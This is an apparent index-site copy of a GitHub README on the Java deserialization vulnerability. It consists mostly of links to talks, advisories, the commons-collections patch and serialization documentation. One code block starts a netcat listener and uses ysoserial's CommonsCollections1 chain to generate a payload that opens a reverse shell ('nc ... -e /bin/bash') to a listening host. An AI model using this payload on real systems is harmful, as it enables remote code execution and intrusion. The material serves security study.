An open API service indexing awesome lists of open source software.

https://github.com/tedwon/java-deserialization-vulnerability

Example for Java Deserialization Vulnerability
https://github.com/tedwon/java-deserialization-vulnerability

Last synced: about 1 year ago
JSON representation

Example for Java Deserialization Vulnerability

Awesome Lists containing this project

README

          

== Java Deserialization Vulnerability
image::https://github.com/tedwon/java-deserialization-vulnerability/workflows/Java%20CI%20with%20Maven/badge.svg[Java CI with Maven]

![Java CI with Maven](https://github.com/tedwon/java-deserialization-vulnerability/workflows/Java%20CI%20with%20Maven/badge.svg)

* OWASP AppSecCali 2015 - Marshalling Pickles
** https://www.slideshare.net/frohoff1/appseccali-2015-marshalling-pickles
* OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate Java Object Deserialization
** https://www.slideshare.net/frohoff1/deserialize-my-shorts-or-how-i-learned-to-start-worrying-and-hate-java-object-deserialization
* https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
* https://issues.apache.org/jira/browse/COLLECTIONS-580
** https://issues.apache.org/jira/secure/attachment/12771520/COLLECTIONS-580.patch
* commons-collections:3.1
* https://github.com/apache/commons-collections
* https://m.blog.naver.com/skinfosec2000/220887425296
* Remotely Exploitable Java Zero Day Exploits through Deserialization
** https://www.infoq.com/news/2015/11/commons-exploit
* https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf

== ysoserial
* https://github.com/frohoff/ysoserial
* http://frohoff.github.io/appseccali-marshalling-pickles/

[source,options="nowrap"]
----
nc -lvnp 4000

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections1 "nc 192.168.99.101 4000 -e /bin/bash" | xxd | head -3

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections1 "nc 192.168.99.101 4000 -e /bin/bash" > reverse.bin
----

== Workaround
* I think we can use Byteman.
** http://byteman.jboss.org/
** https://tedwon.atlassian.net/wiki/spaces/SE/pages/1213364/Byteman
** https://www.slideshare.net/tedwon/12th-jco-jbossrhqbyteman

== Java Serialization
* Java Object Serialization Specification version 6.0
** https://docs.oracle.com/javase/8/docs/platform/serialization/spec/serialTOC.html
* https://www.javaworld.com/article/2072752/the-java-serialization-algorithm-revealed.html
* https://www.mkyong.com/java/how-to-read-and-write-java-object-to-a-file/
* https://tedwon.atlassian.net/wiki/spaces/SE/pages/1212665/Java+Serialization
* JavaSerializationTest.java https://gist.github.com/tedwon/1a1231349919433968bae49827883f94
* https://www.ibm.com/developerworks/library/se-lookahead/
* https://dzone.com/articles/serialization-amp-de-serialization-in-java

== serialVersionUID
* https://docs.oracle.com/javase/8/docs/api/java/io/Serializable.html

== Apache Thrift
* https://www.cvedetails.com/product/38295/Apache-Thrift.html